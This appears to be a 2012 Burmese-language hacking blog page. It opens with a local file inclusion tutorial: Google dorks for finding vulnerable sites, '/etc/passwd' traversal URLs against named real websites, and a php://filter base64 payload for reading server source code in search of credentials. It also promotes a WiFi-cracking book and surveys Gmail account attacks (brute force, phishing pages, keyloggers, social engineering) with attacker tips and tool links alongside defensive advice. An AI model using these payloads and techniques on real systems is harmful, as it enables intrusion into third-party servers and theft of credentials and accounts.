Thursday, April 26, 2012

LFI with php://filter



ဒီပိုစ့္ေလးဟာ LFI ေပၚမွာဆင့္ကဲေျပာင္းလဲထားတာျဖစ္ျပီးေတာ့ BASE 64 php filter ကိုအသံုးျပဳမွာျဖစ္ပါတယ္....။ဆာဗာမွာရိွတဲ့ connect.php / config.php / index.php လိုမ်ိဳး php ဖိုင္ ေတြကိုျမင္ေတြ႕ႏိုင္မွာျဖစ္ပါတယ္...။
ပထမဆံုးေအာက္ပါ LFI Dorks ေတြကိုသံုးျပီး LFI vulnerable sites ေတြကိုရွာပါ...။

inurl:index.php?page=index.php
inurl:index.php?page=sitemap.php
inurl:index.php?page=awards.php
inurl:index.php?page=book.php
inurl:index.php?page=store.php
inurl:index.php?page=items.php
inurl:index.php?page=feedback.php
inurl:index.php?page=welcome.php
inurl:index.php?page=advertise.php
inurl:index.php?page=festival.php
inurl:index.php?page=band.php
inurl:index.php?page=musicians.php
inurl:index.php?page=artist.php
inurl:index.php?page=archive.php
inurl:index.php?page=facilities.php
inurl:index.php?page=activies.php
inurl:index.php?page=bio.php
inurl:index.php?page=biography.php
inurl:index.php?page=menu.php
inurl:index.php?page=profile.php
inurl:index.php?page=terms.php
inurl:index.php?page=tos.php
inurl:index.php?page=screenshots.php
inurl:index.php?page=plans.php
inurl:index.php?page=templates.php
inurl:index.php?page=browse.php
inurl:index.php?page=shows.php
inurl:index.php?page=dining.php
inurl:index.php?page=media.php
inurl:index.php?page=offers.php
inurl:index.php?page=photogallery.php
inurl:index.php?page=schools.php
inurl:index.php?page=rates.php
inurl:index.php?page=buy.php
inurl:index.php?page=pricing.php
inurl:index.php?page=web.php
inurl:index.php?page=cms.php
inurl:index.php?page=sponsors.php
inurl:index.php?page=login.php
inurl:index.php?page=admin.php
inurl:index.php?page=register.php
inurl:index.php?page=signin.php
inurl:index.php?page=signup.php
inurl:index.php?page=artikel.php
inurl:index.php?page=kontakt.php
inurl:index.php?page=directions.php
inurl:index.php?page=farm.php
inurl:index.php?page=resume.php
inurl:index.php?page=products.php
inurl:index.php?page=music.php
inurl:index.php?page=agenda.php
inurl:index.php?page=faculty.php
inurl:index.php?page=overview.php
inurl:index.php?page=research.php
inurl:index.php?page=publications.php
inurl:index.php?page=outreach.php
inurl:index.php?page=education.php
inurl:index.php?page=regulatoins.php

ေအာက္ေဖၚျပပါဆိုက္ေတြကို ဥပမာအျဖစ္သံုးႏိုင္ပါသည္........။

http://www.evoca.ch/index.php?page=../etc/passwd
http://www.moto-plus.net/index.php?Page ... etc/passwd
http://www.maxparts.ru/index.php?page=/etc/passwd
http://www.die-drid.de/index.php?mod=ko ... etc/passwd
http://www.sdhpardubice.cz/index.php?page=/etc/passwd
http://www.lc-bensberg-schloss.de/index ... etc/passwd
http://www.misbrugscenterherning.dk/ind ... etc/passwd
==========================================
ဥပမာအေနနဲ႕ ေအာက္ေဖၚျပပါ URL ကိုသံုးထားပါသည္။
http://modelspromo.com/index.php?page=/etc/passwd 

ျပီးရင္ ?page= ဆိုတဲ့ေနာက္မွာ ေအာက္ေဖၚျပပါ ကုတ္မ်ားကိုေပါင္းထည့္ေပးပါ.....။

php://filter/convert.base64-encode/resource=index.php
============================================
ေအာက္ပါပံုစံအတိုင္း ျဖစ္ပါသည္..........။

http://modelspromo.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
သင့္ browser ထဲမွာေအာက္ပါအတိုင္း ျမင္ေတြ႕ရပါလိမ့္မည္........။ပံုမျမင္ရလွ်င္ ကလစ္ေထာက္ျပီးၾကည့္ပါ...။

ျမင္ေတြ႕ရေသာကုတ္မ်ားကို ကူးယူလိုက္ပါ..။ေအာက္ပါလိုေပါ့........။
PD9waHAKCnNlc3Npb25fc3RhcnQoKTsKCmlmKCRfR0VUWydwYWdlJ109PSIiKSAkcGFnZSA9ICJo ... ..... etc 
ျပီးရင္ http://www.crypo.com/tools/eng_base64d.php ကို သြာျပီး paste လုပ္လိုက္ပါ......။
ပံုမွန္အတိုင္းဆိုလွ်င္ index.php
source ေတြကိုမျမင္ရပါဘူး............
ျပီးရင္ decrypt ကိုကလစ္ပါ....အခုဆိုရင္ကၽြန္ေတာ္တို႕ index.php ရဲ႕ source code ေတြကိုျမင္ရပါျပီ...။


connection.php / config.php / configuration.php / configure.php / connect.php ..etc မ်ားတြင္
Data အမ်ားစုကိုထားတတ္ၾကပါသည္....။
တကယ့္ တကယ္ tutorial က ဘာမွ မဟုတ္ဘူးး.. ေရးထားတာကေတာ့ အရွည္ၾကီးပဲ ဟီးးး
အတိုခ်ဳပ္ေျပာရရင္
LFI ေပါက္တဲ့ ေနရာမွာ ဒီ codes
php://filter/convert.base64-encode/resource=index.php
ေလး နဲ႕ php codes ေတြ hack ပီး ၾကည့္တာ
index.php အစား ၾကိဳက္တာ ၾကည့္ေပါ့ login.php တို႕ admin.php တို႕ ဘာညာကြိကြ ...
ကံေကာင္းရင္ username password ေတြရမယ္ :)........

Tuto By
source from mmhackforums.noonhost.com
Read More ->>

WiFi Hack နည္း ျမန္မာလို စာအုပ္




Back Track 5 ေဆာ့ဝဲလ္ ကို အသံုးျပဳျပီး WiFi Password Hack နည္းေလးကို အေသးစိတ္ ရွင္းျပထားတဲ႔ ျမန္မာလို ေရးထားတဲ႔ စာအုပ္ေလးပါ... Facebook က သူငယ္ခ်င္းတစ္ေယာက္ဆီကေန အားလံုးအတြက္ ျပန္လည္ မွ်ေဝေပးလိုက္ပါတယ္...။

အားလံုးေပ်ာ္ရႊင္ၾကပါေစဗ်ားးး...:)



copy from:www.winkabarkyaw.co.cc
Read More ->>

Sunday, April 22, 2012

Gmail Hacking is 100% work or not? And Gmail passwords are 100% safe or not?



Intro:

ဒီပိုစ့္သည္ Tutorial လဲမဟုတ္ပါ ေဆာင္းပါသက္သက္လဲမဟုတ္ပါ...။

Gmail passwords are 100% safe or not?

Gmail နဲ႕ ပတ္သက္ျပီးေတာ့ ကၽြန္ေတာ္ယံုတမး္ပံုျပင္ေတြေကာ...တကယ့္ အျဖစ္အပ်က္ေတြေကာအမ်ိဳးမ်ိဳး မွန္သမွ်ကၽြန္ေတာ္ ၾကားဘူးပါတယ္....။Gmail နဲ႕ ပတ္သက္ျပီေတာ့ ဘယ္လိုလံုျခံဳေအာင္ကာကြယ္ရမလဲ ဘယ္လိုမ်ား Attacking လုပ္ရမလဲေတြေကာ အမ်ိဳးမ်ိဳးပါပဲ........။
Gmail နဲ႕ ပတ္သက္ျပီေတာ့ ဘယ္လိုလံုျခံဳေအာင္ကာကြယ္ရမလဲ ဆိုတဲ့ ပို႕စ္ေတြကိုအမ်ားၾကီးဖတ္ဘူးပါတယ္
သူတို႕သိသေလာက္ေရးထားေပမယ့္လိုအပ္ခ်က္ေတြအမ်ားၾကီးရိွသလို တစ္ခ်ိဳ႕ ပိုစ့္ေတြလဲ ေတာ္ေတာ္ျပည့္စံုပါတယ္.......။ဒါေပမယ့္ သင့္ Gmail Password ကေကာ 100% လံုျခံဳရဲ႕လား လံုျခံဳေအာင္ဘာေတြကိုလုပ္ေဆာင္ရမလဲ.........။Hacker ေတြကသင့္ Gmail password ကို ဘယ္လို တိုက္ခိုက္တတ္သလဲ ........ဒါေတြကိုေကာ သင္ေလ့လာဘူးပါလား........။

 Gmail Hacking is 100% work or not?

သင္သည္ Gmail Account တစ္ခုကို hacking လုပ္ဖို႕ လြယ္ပါ့မလား......Gamil account name တစ္ခုရ
ရံုနဲ႕ အဲဒီ Gmail ကိုတိုက္ခိုက္လို႕ရမလား.....လို႕ေတြးဘူးပါသလား။ တျခား နည္းေတြ phishing စတဲ့ နည္း ေတြကေကာ အသံုး၀င္ပါသလား.......။ကၽြန္ေတာ္ကေတာ့ကၽြန္ေတာ့္ အေတြ႕ အၾကံဳအရ online ေပၚမွာ gmail hacking tutorial ေတြေကာ gmail hacking tools ေတြေကာအမ်ားၾကီးေတြ႕ဘူးပါတယ္...။တစ္ခ်ိဳ႕ဟာေတြအဆင္ေျပသလိုလိမ္ညာမႈေတြအမ်ားၾကီးၾကံဳ ဘူးခဲ့ပါတယ္.........။တခ်ိဳ႕ tool ေတြဆိုရင္ account နာမည္သိရံုနဲ႕ တိုက္ခိုက္ႏိုင္တယ္လို႕ ေရးသာထားၾက ပါတယ္.....။အဲဒါေတြေကာ တကယ္ျဖစ္ႏိုင္ပါသလားး........။

Theory:

Gmail သည္ 100% လံုျခံဳေသာ online base mail ဆားဗစ္ျဖစ္ပါသည္။...ဟုတ္တယ္ေလဒါေလာက္မွ မလံုျခံဳဘူးဆို google နာမည္ပ်က္ရံု ရိွမွာေပါ့။ဒါဆိုရင္ေကာ ဘာလို႕ Gmail.Gtalk အေကာင့္ေတြ Hack ခံရသလဲ ေမးၾကပါလိမ့္မယ္........။ခိုးခံရတယ္ ဆိုတာ သင္တို႕ရဲ႕ Low level အေတြ႕အၾကံဳ၊ အသိညဏ္ ၊
အေတြးအေခၚ တို႕ျဖစ္ၾကပါတယ္.....။တစ္ခါတစ္ internet ဆိုင္ေတြမွဆိုရင္ ေဇာ္ဂ်ီ ေဖာင့္နဲ႕ password ရိုက္ေနျပီး အေကာင့္ခိုးခံရတယ္လို႕ ထထေအာ္တာခဏတိုင္းၾကံဳ ဘူးပါတယ္.....။အဲ လက္စသပ္ေျပာရရင္ ေတာ့ Gmail အေကာင့္သည္ ၁၀၀% လံုျခံဳပါသည္ ၁၀၀%လည္း Hacking လုပ္ႏိုင္ ပါသည္......သင္အသံုးအက်ရင္ေပါ့.....။သင္နည္းနည္းအေတြ႕ၾကံဳနည္းတယ္ဆိုရင္ ေအာက္ကေဆာင္းပါေတြ ကိုဆက္လက္ဖတ္ရႈႏိုင္ပါသည္.....။Gmail အေကာင့္ပါသြားသူမ်ားလဲ အေတြအၾကံဳ ေကာင္းေတြရရန္ ဆက္ဖတ္ႏိုင္ပါသည္.......။Gmail အေကာင့္ပါသြားသူမ်ား ဒီပိုစ့္ကို အဆံုးထိဖတ္ျပီး သင္တို႕ဘယ္ေလာက္ မွာခဲ့ၾကသလဲ ဆိုတာ သင့္တို႕ကိုသင္တို႕ ျပန္သံုးသပ္ႏိုင္ပါသည္........။
========================================================
Methods of Gmail hacking
========================================================
Password Crack;

ဒီ Method အတိုက္ခံရသူမ်ား သည္...password ေရြခ်ယ္မႈညံ့ေသာေၾကာင့္ျဖစ္ပါသည္.....။ဒီ Method တြင္ေအာက္ပါ အတိုင္းခြဲျခားေလ့လာႏိုင္ပါသည္......။
========================================================
(1) Dictionary Attack



ရွင္းပါတယ္ password ေတြကို Dictionary အတိုင္းတိုက္စစ္တာပါ။ Dictionaryထဲမွပါတဲ့ စကားစုေတြကို
သင္အသံုးျပဳမယ္ဆိုရင္ သင္သည္ တကယ့္အညံ့ဆံုး password ေရြးခ်ယ္မႈျဖစ္ပါတယ္..ဥပမာ "vampire"
တို႕လိုစကာလံုးမ်ိဳးကိုအသံုးျပဳသူေတြဆိုပါေတာ့..။တအားကိုညံ့လြန္းပါတယ္....။ခဏေလးနဲ႕ passwords cracking လုပ္ႏိုင္ၾကပါတယ္..........။
=========================================================
(2) Number Crack






ဒီနည္းက ကန္႕သက္ခ်က္ရိွပါတယ္..။ဥပမာ သင့္သားေကာင္ရဲ႕ account password က နံပါတ္ေတြနဲ႕သာေပးထားရင္ေတာ့ .သင့္အတြက္ေရႊပါပဲ......။account password ေတြက နံပါတ္ေတြျဖစ္ ျပီး 4 လံုးကေန 8 လံုးအတြင္းျဖစ္ပါက အရမ္းကိုလြယ္ကူေသာ password ျဖစ္ပါတယ္....။
အရမ္းလဲအားနည္းပါတယ္.........။ဒါေၾကာင့္ password ေတြကို နံပါတ္ေတြၾကီးမထားသင့္ပါဘူး.....။အရမ္း အရမ္းကို အားနည္းပါတယ္.......။
========================================================
Brute-force cracking



Password cracking method ထဲမွာလူသံုးအမ်ားဆံုးနဲ႕ ကၽြန္ေတာ္စိတ္မရွည္ဆံုးျဖစ္ပါတယ္....။အေကာင္း ဆံုးေပမယ့္ ဒီနည္းက password ေတြကို တစ္ေၾကာင္းျခင္း တိုက္စစ္တာျဖစ္လို႕ အခ်ိန္ေပးရသလို dictionary words ေတြနဲ႕ Number ေတြေပါင္းထားတဲ့ password ေတြကို အသာေလး cracking လုပ္ ႏိုင္ ပါတယ္.....။ ဥပမာ vampire2006 လိုဟာမ်ိဳးေပါ့...။ဒီ Method လိုအပ္သလဲလိုရင္ Word list ေတြနဲ႕ brute-force cracking tool လိုအပ္ပါတယ္.....။ဒီေနရာမွာ Word list ဆိုတာကိုရွင္းျပမွရ မွာပါ......။

*Word list*

Word list ဆိုတာ ကၽြန္ေတာ္တို႕ password ကိုတစ္ေၾကာင္းျခင္းတိုက္ စစ္ဖို႕ စာလံုးေတြကိုစုေစာင္းထားတဲ့ ဖိုင္ေလးပါ....။ .txt ဖိုင္ေလးျဖစ္ပါတယ္......။ကၽြန္ေတာ့္ဆီမွာ 1.5million word list ေတြရိွပါတယ္...။အဲဒါ ကို ဒီမွာသြားဖတ္ႏိုင္ပါတယ္.......။http://www.shweko.co.cc/2011/12/15million-word-list.html
=======================================================
brute-force cracking နဲ႔ပတ္သက္ျပီသိခ်င္ေသးတယ္ဆိုရင္လဲ ဒီမွာ သြားဖတ္ႏိုင္ေသးပါတယ္...။ tool ေတြေကာရိွပါတယ္.....လိုခ်င္ယူသြားႏိုင္ပါတယ္.......။
http://www.shweko.co.cc/search/label/Brute%20Force
=======================================================
ဘယ္လိုကာကြယ္ရမလဲ

အားေကာင္းေသာ password ျဖစ္ရန္ မွတ္ရခတ္ေလာက္ေအာင္.....အရွည္ၾကီးလဲမလိုပါ...အနည္းဆံုး 8 လံုးထားသင့္ပါတယ္......။upper case ေတြ၊ စာလံုးအၾကီးေတြ ၊ နံပါတ္ေတြ သာမန္စကာလံုးေတြကို ေရာ
ညွပ္သံုးပါ.......။ဥပမာ Mm@ttAck3& ဆိုတဲ့ပံုစံမ်ိဳးေပါ့ ......။ဒီလိုမ်ိဳးဆိုရင္ ဘယ္ Brute Force attack မွ မတိုက္ႏိုင္ပါဘူး......တိုက္လဲ အိုေသေတာ့မွရပါလိမ့္မယ္.......။ဟုတ္တယ္ေလ တစ္လံုးခ်င္း တစ္ေၾကာင္း ခ်င္းတိုက္စစ္ တာပဲ ဒါမ်ိဳးစကားစုဆိုတာ အေတာ္ရွား ပါတယ္....။wrod list ကို ဘီလီယံ ခ်ီျပီးေတာ့ရိွမွ အဆင္ေျပပါလိမ့္မယ္....။ပိုျပီလံုခ်င္ရင္ password ကိုတစ္ပတ္တစ္ခါမေျပာင္းႏိုင္ေတာင္မွ တစ္လတစ္ခါ ေျပာင္းသံုးသင့္ပါတယ္........။သင့္ password ကဘယ္ေလာက္လံုခ်ံဳသလဲဆိုတာ..ဆိုက္ေလးတစ္ခုနဲ႕မိတ္ဆက္ေပးပါမယ္။ေအာက္ကလင့္ကိုသြားလိုက္ပါ။
http://www.passwordmeter.com/
အလကား၊အခမဲ့အသံုးျပဳခြင့္ေပးထားတာပါ။
ေအာက္မွာကၽြန္ေတာ္စမ္းသပ္ထားတာပါ။ 100% ရေအာင္လုပ္ပါ။သူကဘာေတြလိုအပ္သလဲဆိုတာပါ
ေ၀ဖန္ေပးပါလိမ့္မယ္။


For Attacker : အားနည္းတဲ့ password ဆိုရင္ 80% ေလာက္ Attack ျပဳလုပ္ႏိုင္ပါတယ္။
For User : အားနည္းတဲ့ password ဆိုရင္ ေသျခာေပါက္ crack ခံရမွျဖစ္ပါတယ္.....။

 ေနာက္ Method တစ္ခုေျပာင္းၾကည့္ရေအာင္....။
========================================================
Phishing Method



Phishing ဆိုတာ web စာမ်က္ႏွာအတုျဖစ္ပါတယ္...Gmail စာမ်က္ႏွာဆိုရင္ လဲ တကယ့္ Gmail စာမ်က္ ႏွာနဲ႕ ပံုစံတူျဖစ္ျပီး.....ကိုယ္က Gmail အစစ္ထင္ကာ၀င္ေရာက္လိုက္သူေတြအတြက္ user name ေတြ password ေတြ ကို attacker ရဲ႕ hosting base ကိုေရာက္ရိွသြားတာပါ...။မ်ားေသာအာျဖင့္
Phishing မွာ ဖိုင္သံုးဖိုင္ပါ၀င္ျပီး ပံုစံတူ စာမ်က္ႏွာအတုဖိုင္ (html ဖိုင္)၊ ျပီးရင္ user name ေတြ password ေတြလက္ခံဖို႕ (txt) ဖိုင္တစ္ခု၊ အဲဒီလို user name ေတြ password ေတြ (txt) ဖိုင္ထဲေ၇ာက္ ဖို႕လို႕ ညြန္ၾကားမယ့္....web base programing ဖိုင္ျဖစ္တဲ့ (php) ဖိုင္တစ္ခု အားလံုးေပါင္း (၃)ခုပါ၀င္ပါတယ္။ကၽြန္ေတာ္တစ္ခါက ကိုယ့္ႏိုင္ငံ က social network ဆိုဒ္ တစ္ခုမွာ Phishing အေၾကာင္းေရးဘူးပါတယ္..။ ဘယ္လိုအေျပာခံရသလဲ ဆိုရင္ phishing ဆိုတာကေလးကလား နည္းတစ္ခုပဲတဲ့ .....ေျပာခ်က္ကရင္နင့္ စရာပါ....။ကၽြန္ေတာ္လဲ ေစာက္ျမင္ကတ္ကတ္ နဲ႕ php source ကိုခ်ျပျပီေပါ့ သူ႕ကို ကေလးကလားဆိုရင္ ဒါေလးကို ရွင္းျပေပးပါလားလို႕ ေျပာေတာ့ အဲဒီငနာက အတီးအတ ျဖစ္သြားတယ္......။ဟုတ္တယ္ေလ သူတို႕သိတဲ့ phishing ဆိုတာဖိုင္ေတြကို ေဒါင္လုပ္ခ် ျပီး
ရင္ Hosting ေပၚတင္ျပီသံုးၾကမယ္ေပါ့....ဒါပါပဲ...ဘယ္လိုလုပ္ေဆာင္သလဲလိုဆိုသိတဲ့သူရွားပါတယ္.....။
Phishing က ကေလးကလားဆိုရင္ Paypal စာမ်က္ႏွာေလးကိုပဲတူေအာင္လုပ္ၾကည့္။phising ဆိုတာ ကေလးကလားဆိုၿပီး တခ်ိဳ ့ကေၿပာခ်င္ၾကတယ္.. အမွန္တကယ္ သူလည္းသူ ့ပညာနဲ ့သူပါပဲ ... တခ်ိဳ ့ဆို gmail, facebook တင္မကဘူးး ... paypal, visa, libertyreserve စတဲ့ online money transfer န ဲ့ ပတ္သက္ေနတဲ ့ဆိုကဒ္အတုေတြေတာင္ လုပ္ၾကပါတယ္.. တခ်ိဳ ့ကလည္အးလြယ္ေၿပာတယ္.. phising ဆိုတာလြယ္ပါတယ္တဲ့ index page မွာ source code ကို ဖြင့္ link ေပးတဲ့ေနရာမွာ ေနရာလြဲၿပီးေတာ့ ကိုယ့္ hosting မွာ .txt ဖိုင္တခုနဲ့ သိမ္းလို ့ရရင္ၿပီးေရာေပါ့တဲ့ ... ကဲ .. အခု ... libertyreserve ဆိုက္ဒ္ကို လုပ္ၾကည့္ပါ အဲ့လိုရရင္ တစ္သန္းေၾကးေတာင္ ေလာင္းလိုက္ခ်င္ေသး ( နီကိုရဲ စတိုင္  ) liberty reserve မွာဆို ကိုယ့္အေကာင့္ထဲေရာက္ဖုိ ့ pincode ပါၿဖည့္ရပါတယ္ ... login page ၿပီး၇င္ pincode page ေရာက္သြားပါေရာလား .. ဒါေတာင္ သူတို ့က keylogger ရန္ကို ကာကြယ္တဲ့ အေနနဲ ့ pincode ကို OSK ( on screen keyboard ) လိုမ်ိဳး click ေထာက္ၿပီးၿဖည့္ခိုငိးတာပါ... ကဲ ခင္ဗ်ား လြယ္ပါတယ္လို ့ေၿပာတဲ့ phising အခုဘယ္လိုလုပ္မလဲ............။ကမာၻေပၚမွာ Bank အေကာင့္ေတြ တျခား online shopping ေကာင့္ေတြအမ်ားဆံုးအခိုးခံရတာ ဒီ Phishing နည္း ခုကၡေပးတာပါပဲ.....။
ကၽြန္ေတာ္ေရးသာထားတဲ့ Phishing နဲ႕ပတ္သက္တဲ့ပိုစ္ေတြကို ဖတ္ခ်င္ေသးရင္ဒီလင့္ေလးက သြားဖတ္လိုက္ပါ........။

http://www.shweko.co.cc/search/label/Phishing
========================================================
ဘယ္လိုကာကြယ္ရမလဲ

Gmail phishing page ကို online ေပၚမွာနဲ႕ local network area မွာေကာ အသံုးျပဳၾကပါတယ္....။
local network area or internet cafe ေတြမွာဆိုရင္ Browser(ဥပမာ mozilla firefox) ေတြရဲ႕Home
page မွာ Gmail phishing page ကိုတင္ထားခဲ့ၾကပါတယ္....။online ေပၚမွာကေတာ့ social Engineering ကို အသံုးျပဳရတာျဖစ္ျပီး .ဥပမာသင့္ေမးထဲကို " မင္းအေကာင့္ကိုငါဟက္ျပီးျပီ မယံုရင္ ျပန္ ၾကည့္ဆိုျပီး "သူ႕ Gmail phishing page ကိုလင့္ေပးတာမ်ိဳးေပါ့...။တစ္ခါတစ္ရံ နာမည္ၾကီးတဲ့ "social network ဆိုက္ေတြမွာ gmail ကေန ဆက္သြယ္ ခ်င္ရင္" ဆိုျပီးေတာ့သူ႕ Gmail phishing pageကို လင့္ ေပးထားတတ္ၾကပါတယ္....။

ဒါေပမယ့္ ဘယ္လိုပဲျဖစ္ျဖစ္ပါပဲလုပ္လုပ္ Gmail phishing page address က ဘယ္လိုမွ http://mail.google.com မျဖစ္ႏိုင္ပါဘူး ။ mail.google.comဆိုတဲ့ Domain Name ဘယ္လိုမွ အတုလုပ္ လို႕ မရပါ......။ဆင္တူတာေတြေတာ့လုပ္လိုရပါတယ္....။ဥပမာ  mialgoogle.co တို႕ဘာတို႕ေပါ့...။တစ္ခါ
တစ္ေလ ဗရုတ္သုတ္ခ domain ေတြေတာင္ရိွေသးတယ္..../ ဥပမာ ။     ။jellket.36nnet.com ဆိုတာမ်ိဳး ေတြေပါ့.......။တစ္ခါတစ္ေလ google url shorter ကိုသံုးျပီး လင့္ကို ပံုေျပာင္းထားတတ္ၾကပါ
တယ္........။
ဘယ္လိုပဲျဖစ္ျဖစ္ Gmail သံုးမယ္ဆိုရင္ address ဘားကို အရင္ၾကည့္ပါ.....။ Gmail address မဟုတ္ရင္
မ၀င္ပါနဲ႕.....။ ေသခ်ာေအာင္ Gmail သံုးမယ္ဆိုရင္ mail.google.com ဆုိျပီးကိုယ္တိုင္ ရိုက္ျပီး အသံုးျပဳ ပါ.....။သူမ်ားေပးေသာလင့္မ်ား...ကိုယ္ထိုင္ေသာစက္မွာေအာ္တို ေပၚလာေသာ Gmail page မ်ားကိုေသခ်ာ address bar ကိုေသျခာ ၾကည့္ရႈေလ့လာျပီမွာသံုးပါ...။
========================================================
For Attacker : မိမိ  Phishing Page ကို မိမိသားေကာင္အေနႏွင့္ေသျခာေပါက္ အသံုးျပဳခဲ့လွ်င္ 100% အက်ိဳးျပဳပါသည္...။အာနည္းခ်က္မွာ URL ကိုၾကည့္ရံုနဲ႕ အရမ္းသိသာပါသည္......။
For User :  internet အသံုးျပဳတဲ့ အခါမွာ Gmail မွာမဟုတ္ပါဘူး ../ မိမိ အသံုးျပဳေသာဆိုက္မွန္ သမွ်ကို
ဆိုက္ Address အျမဲ တမ္းစစ္ပါ.....။ဒါေလးမွ စစ္ဖိုေမ့ေနလွ်င္ အေကာင့္ပါသြားတာသင့္ျပစ္ 100% ပါ၀င္ပါသည္......။ဒီ Method ကိုကာကြယ္ရန္ အနည္းငယ္မွ်ေသာ အေတြ႕အၾကံဳ သာလိုပါသည္...။

ေနာက္တစ္ခုဆက္သြားရေအာင္
========================================================
Using Tools
========================================================
(1) Keylogger

Keylogger ဆိုတာဟာ Keyboard မွရိုက္ေသာ password မ်ား...စကာလံုးမ်ား မွတ္သာေပးေသာ tool ျဖစ္ပါသည္...။တစ္ခ်ိဳ႕ ဆိုလွ်င္ မိမိ၀င္ၾကည့္ေသာ web page မ်ားအျပင္ မိမိ အသံုးျပဳေနစဥ္ screen shots ပါရိုက္ေပးထားတတ္ပါသည္...။ေနာက္ျပီး တစ္ခ်ို႕ဆိုလွ်င္.....မိနစ္ အပိုင္းအျခားအလိုက္ Attacker ေတြဆီကုိ report ျပန္ေပးတတ္ၾကပါေသးသည္......။
========================================================
ဘယ္လိုကာကြယ္မလဲ

Deepfreeze လိုေဆာ့၀ဲမ်ိဳးကို အသံုးျပဳပါ....။အသံုးျပဳျပီ စက္ပိတ္လိုက္လွ်င္ keylogger မွမွတ္ထားသမွ် ေပ်ာက္ကုန္မည္.....။ေနာက္ျပီး window os တြင္ပါ၀င္ေသာ screen keyboard ကိုသံုးပါ..။manual keyboard  မဟုတ္ေသာေၾကာင့္ မိမိ password မ်ားကိုမွတ္သာႏိုင္မည္မဟုတ္ပါ...။
screen keyboard အသံုးျပဳရန္  start>>Accessories>>Accessibility>>On-screen keyboard လို႕
သြားျပီးအသံုးျပဳပါ.....။ Intetnet cafe မ်ားတြင္ ပိုျပီးသတိထားပါ......။
========================================================
(2)မိမိအမွားမ်ား

တစ္ခါတစ္ေလမိမိ အမွာမ်ားေၾကာင့္ password မ်ားက်န္ေနခဲ့တတ္ၾကပါသည္..။တစ္ခ်ို႕ကလည္းေသခ်ာ က်န္ေအာင္လုပ္ထားတတ္ၾကပါသည္.....။ထိုကဲ့သိုက်န္ေနခဲ့လွ်င္ ...... password အမဲလံုးေလးမ်ားကို password viewer မ်ားအသံုးျပဳျပီးေတာ့ စကာလံုးမ်ား အျဖစ္ ေဖၚယူၾကည့္ရႈႏိုင္ပါတယ္.......။ေအာက္က
လင့္ကေန အေသးစိတ္ဆက္လက္ဖတ္ရႈႏိုင္ပါသည္.........။
http://www.shweko.co.cc/search/label/passwoard%20viewer
========================================================
ဘယ္လိုကာကြယ္မလဲ


Gtalk ပဲသံုးသံုး Gmail ကိုပဲ သံုးသံုး remember password ဆိုတာေလးကို အမွန္ခ်စ္ျဖဳတ္ပါ....။
internet cafe ေတြမွာဆိုရင္ deepfreeze ရိွမွသံုးပါ အသံုးျပဳျပီး စက္ကိုျပန္ပိတ္ခဲ့ပါ....။Browser ကိုသံုးျပီး
ရင္ Tools>>Clear Recent History>>Time range to clear ကို Everthing ေျပာင္းျပီး အမွန္ခ်စ္ အကုန္ထည့္ျပီး clear now ကိုကလစ္ျပီး သင့္၏ေျခရာလက္ရာေတြကိုအကုန္ရွင္းခဲ့ပါ.......။
========================================================
မွတ္ခ်က္။        ။တျခား hacking tools ေတြအမ်ားၾကီးရိွပါတယ္....။အခ်ိန္မရလိုဒီေလာက္ပါပဲ..။ဒါဆိုရင္ကို
ေတာ္ေတာ္လံုေလာက္ပါတယ္........။
========================================================
For Attacker :Keylogger လို Tools ေတြသံုးျပီးလုပ္ တာဆိုတာခပ္ညံ့ညံ့Attacker ေတြလုပ္ တာျဖစ္ပါတယ္...။အားမေပးခ်င္ပါဘူး....။သားေကာင္းရဲ႕ စက္မွာ Deepfreeze လိုေဆာ့၀ဲေကာင္းေတြတင္
ထားရင္ဘာမွာလုပ္မရပါ.....။
For user : အေတြ႕ အၾကံဳ အျပင္ ဗဟုသုတ အနညး္ငယ္လိုသလို စာမ်ားမ်ားဖတ္ဖို႕လိုပါတယ္.....။
ေနာက္ဆံုးကိုဆက္ၾကည့္လိုက္ရေအာင္.....။
========================================================
Social Enginnering




အယုံသြင္းတာပါ.....။computer အေတြ႕အၾကံဳ အေခၚအေ၀ၚ အနည္းငယ္မွ်သိရံုမွ်ျဖင့္ လူတစ္ေယာက္ကို အယံုသြင္းျပီ လိမ္လည္လွည့္စားျခင္းျဖစ္ပါတယ္.....။လူဆိုတာ အင္မတန္ကို အသိေခါက္ခက္ အ၀င္နက္ပါ တယ္.....။ဥပမာ၀ါသနာတူ ။အၾကိဳက္တူတဲ့ပံုစံမ်ိဳးနဲ႕ အေ၇ာ ၀င္ျပီး ႏွိက္ သြားၾကတာပါ...။လူဆိုတာ အယံု လြယ္ဆံုး သတၱ၀ါမဟုတ္လား........။Social Enginnering ကက်ယ္ျပန္႕ပါတယ္ ကၽြန္ေတာ္ေျပာသေလာက္
မက အမ်ားၾကီးအသံုးျပဳႏိုင္ပါတယ္......။ကၽြန္ေတာ္တစ္ခါၾကံဳဘူးပါတယ္......။ ေစ်း၀ယ္တဲ့ ဆိုက္တစ္ခုထဲ ကၽြန္ေတာ္သြားတယ္ဗ်ာ(မမွတ္မိေတ္ာ့ပါဘူး)...အဲဒီမွာ ၀င္ၾကည့္သူလူဦးေရ 10000 ျပည့္လိုဆိုျပီးေဒၚလာ 10000 သင္ဆုရတယ္ဆိုျပီးေပၚလာတာ......လူကိုဖလန္းဖလန္းထသြားတာပဲ.....။ေနာက္ျပီး paypal ဆိုက္ကိုညြန္ထားတယ္...။သင့္ paypal အေကာင့္ထဲကို လဲြေပးမယ္ေပါ့.။ကၽြန္ေတာ္ကအဲဒီအခ်ိန္တုန္းက online စသံုးတတ္ခါစ ေစ်း၀ယ္တဲ့ ဆိုက္ထဲ၀င္တာဆိုတာလဲ မိုဘိုင္းေတြ လိုက္ရွာၾကည့္တာ.......။လားလား paypal ဆိုက္အတုကိုညြန္းထားတာဗ်.....။ေတာ္ေသးတာေပါ့ ကၽြန္ေတာ္ကဒီႏိုင္ ငံကဆိုေတာ့ paypal ႏွင့္ ဘာမွ ဆိုင္ဘူးရယ္......အဲဒါေၾကာင့္ ဟီး.....။လူ႕ေလာဘာကိုအသံုးခ်ျပီး အယံုသြင္းသြားတာေလ......။
ဘယ္လိုကာကြယ္ရမလဲဆိုတာကေတာ့ သင့္ password ကိုသင္ကိုယ္တိုင္အသံုးျပဳပါ....။ဘယ္သူ႕ကိုမွ ေပး
မသံုးပါနဲ႕.....။online ေပၚမွာ ဘာမွမယံုပဲ ေသျခာ ညဏ္သံုးတာအေကာင္းသံုးပါပဲ လိုေျပာရင္းးးးးးးး
